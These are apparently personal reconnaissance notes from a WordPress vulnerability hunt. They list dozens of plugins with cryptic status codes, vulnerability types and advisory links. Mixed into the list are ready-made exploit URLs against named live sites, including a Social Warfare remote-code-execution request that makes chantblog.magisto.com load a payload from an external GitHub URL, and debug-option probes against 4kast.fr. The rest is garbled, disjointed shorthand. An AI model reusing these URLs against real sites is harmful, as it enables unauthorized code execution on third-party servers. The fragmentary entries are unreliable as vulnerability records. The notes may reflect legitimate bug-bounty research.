JETPACK 5 https://hackerone.com/reports/733248 custom-twitter-feeds 1 0 wordpress-seo 9+ https://wpvulndb.com/search?text=wordpress-seo https://www.cvedetails.com/vulnerability-list/vendor_id-14987/Yoast.html code-prettify 1 0 schema 2 https://wpvulndb.com/vulnerabilities/8834 search-everything 2 safe https://wpvulndb.com/search?text=search-everything drop-shadow-boxes 1 safe - psn-omniture 7 (playstation) 0 c stream 8+ c https://wpvulndb.com/vulnerabilities/8504 sitepress-multilingual-cms 8+ s dota https://medium.com/@arall/sitepress-multilingual-cms-wplugin-wpml-4-3-7-b-2-9c9486c13577 https://wpvulndb.com/search?text=sitepress-multilingual-cms&vuln_type= w3-total-cache 7+ all dota 13.03 latest 14+ s https://wpvulndb.com/search?text=w3-total-cache https://www.cybersecurity-help.cz/vdb/SB2019050701 constant-contact-forms 2 safe - facebook-Comment 1 s - masterslider 3 s - newsletter 1 vul https://chantblog.magisto.com https://wpvulndb.com/vulnerabilities/10135 https://web.archive.org/web/20200318060004/https://fortiguard.com/zeroday/FG-VD-20-045 RCE FIND CSV injection sassy-social-share 2 - selection-sharer 1 - shortcodes-ultimate 5 ec-coun s https://wpvulndb.com/vulnerabilities/9953 webpushr-web-push-notifications 1 s - wordpress-23-related-posts-plugin 2 s - wordpress-seo-premium 8+ c - wp-google-map-plugin 1 s - cookie-notice 1 s - avatar-manager 1 s - wp-hide-post 2 0 zilla-likes 1 0 addthis 3 s c 1 https://wpvulndb.com/search?text=addthis&vuln_type= 2015 nextcellent-gallery-nextgen-legacy 1 2014 nextgen-gallery 2 auth sql wp-hide-post 3 0 wp-polls 1 s < 2.72 - SQL Injection 2015 related-posts-thumbnails 1 - wpml-translation-management 2 s <= 2.4.1 - PHP Object Injection shareaholic 2 s 7.6.0.3 - XSS mega-addons-for-visual-composer x - meks-flexible-shortcodes x - gdpr-cookie-compliance x auth 2019 social-welfare rce C 1 safe 1 vuln http://4kast.fr/wp-admin/admin-post.php?swp_debug=get_user_options -test https://wpvulndb.com/vulnerabilities/9238 https://wpvulndb.com/vulnerabilities/9259 https://www.webarxsecurity.com/social-warfare-vulnerability/ https://chantblog.magisto.com/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://raw.githubusercontent.com/0xceeb/2020/master/payload.txt https://www.google.com/search?q=social-warfare-vulnerability&client=firefox-b-e&sxsrf=ALeKk03KVz0uW0NpuH5OwlTBZ4GUKyUIrg:1594472459657&ei=C7gJX9PSJ5rgz7sP1tGU8AI&start=10&sa=N&ved=2ahUKEwiThL_koMXqAhUa8HMBHdYoBS4Q8tMDegQICxAt&biw=1366&bih=667 https://chantblog.magisto.com/wp-admin/admin-post.php?swp_debug=get_user_options -bb https://www.siteground.com/kb/wordpress_configuration_filewpconfigphp/ countdown-timer-ultimate - embed-any-document - gravityforms 1 c -w https://wpvulndb.com/vulnerabilities/10252 1 c js_composer 6 s 4.7.3 - Multiple xss masterslider 3 c https://web.archive.org/web/20200226115418/https://www.vulnerability-lab.com/get_content.php?id=2158 auth req real-time-validation-for-gravity-forms - - shortcodes-ultimate 3 s <= 5.0.0 - Auth the-events-calendar 3 c w https://www.wordfence.com/blog/2020/02/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities/ The Events Calendar < 4.8.2 - XSS woocommerce 6 looks -s https://wpvulndb.com/search?text=woocommerce&vuln_type= -c wp-pagenavi 1 s - add-to-any 1 s 1 advanced-ads x auth req constant-contact-forms x - popups x - td-api-plugin x - ck-offers x - ck-tracking x - ajax-load-more x auth sql c easy-author-image x - jsj-code-highlight x - swiftype-search x - atomic-blocks simple-social-icons better-click-to-tweet gs-facebook-comments LayerSlider x page-list Sassy Social Share 2 s 3.3.3 vul https://wpvulndb.com/vulnerabilities/9953 swift-framework x - email-subscribers 2 s uauth sql < 4.3.1 shareaholic 2 c - the-events-calendar 3 s https://wpvulndb.com/search?text=the-events-calendar&vuln_type= elementor / pro 4 x c page-views-count x - profile-builder 1 s https://wpvulndb.com/vulnerabilities/10066 search-everything 2 s https://wpvulndb.com/vulnerabilities/9753 table-maker x - tablepress x - wordpress-23-related-posts-plugin x - wp-video-lightbox x - x-email-mailchimp wp-super-cache c advanced-wp-columns affiliate-wp duracelltomi-google-tag-manager geotargetingwp groovy-menu ld-content-cloner ld-visual-customizer real-time-validation-for-gravity-forms sfwd-lms 1 s < 3.1.6 - Unauthenticated SQL Injection storefront-blog-customiser storefront-mega-menus storefront-parallax-hero storefront-powerpack storefront-pricing-tables storefront-product-hero 930 woocommerce-price-based-country-pro-addon woocommerce-product-bundles woocommerce-product-price-based-on-countries - wt-smart-coupon-pro x 0 fusion-builder x 0 rating-form x 0 link-custom x optin-monster wp-bootstrap-blocks accesspress 1 (cant detrmine ver) < 3.2.0 - Unauth studiopress-privacy-consent . cf7-conditional-fields cookie-consent-plugin popups-plugin custom-shortcode add-search-to-menu ie-sitemode gutenberg pt-content-views-pro pdf-embedder stop-user-enumeration 1 s 2 svg-support studiopress-privacy-consent woocommerce-bulk-discount woocommerce-smart-coupons 1 vul 1 exploit C https://wpvulndb.com/vulnerabilities/10109 yith-woocommerce-frequently-bought-together google-site-kit 1 s > 1.8.0 heroic-blocks ht-knowledge-base basic-mailchimp easy-twitter-feed-widget gallery-images-ape x 1 auth 2019 icegram-rainmaker jm-twitter-cards x 2015 path transversal fastclick-master qtranslate-x disqus-comment-system jquery-smooth-scroll mai-theme-engine print-post-and-page related-posts-by-taxonomy responsive-lightbox w countdown-timer-ultimate go_pricing page-list q2w3-fixed-widget recents-post-widget-extended swift-framework shortcodes-ultimate w elementor / pro 3 auth vulns grab grab-elementor wp-ulike 3.1 2018 w 10up-experience eu-cookie-law auth 2019/10 wp-job-openings wp-statistics v 1 test again 1 sql C https://wpvulndb.com/vulnerabilities/9412 atomic-blocks genesis-header-message native-lazyload studiopress-blocks menu-image netgo-expandablecollapsible-menu